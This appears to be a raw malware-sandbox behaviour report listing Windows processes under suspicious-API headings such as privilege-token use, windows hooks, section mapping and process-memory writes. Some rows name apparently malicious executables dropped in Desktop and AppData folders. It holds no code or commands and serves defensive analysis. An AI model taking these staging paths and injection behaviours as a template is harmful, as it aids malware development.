Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe N/A
N/A N/A \??\c:\program files (x86)\internet explorer\iexplore.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: 33 N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\ProcessMonitor\Procmon64.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files\ProcessMonitor\Procmon64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\sysint\Procmon64.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files\sysint\Procmon64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\XClient.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\XClient.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\built.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\contorax.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\Sentil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Files\Client-built.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77Security.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
N/A N/A C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
N/A N/A C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
N/A N/A C:\Program Files\ProcessMonitor\Procmon64.exe N/A
N/A N/A C:\Program Files\ProcessMonitor\Procmon64.exe N/A
N/A N/A C:\Program Files\ProcessMonitor\Procmon64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\sysint\Procmon64.exe N/A
N/A N/A C:\Program Files\sysint\Procmon64.exe N/A
N/A N/A C:\Program Files\sysint\Procmon64.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\XClient.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\srtware.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\Desktop\Files\c3.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\TPB-1.exe N/A
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\svc.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\qNVQKFyM.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\nobody.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\99awhy8l.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
N/A N/A C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1072 wrote to memory of 3176 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
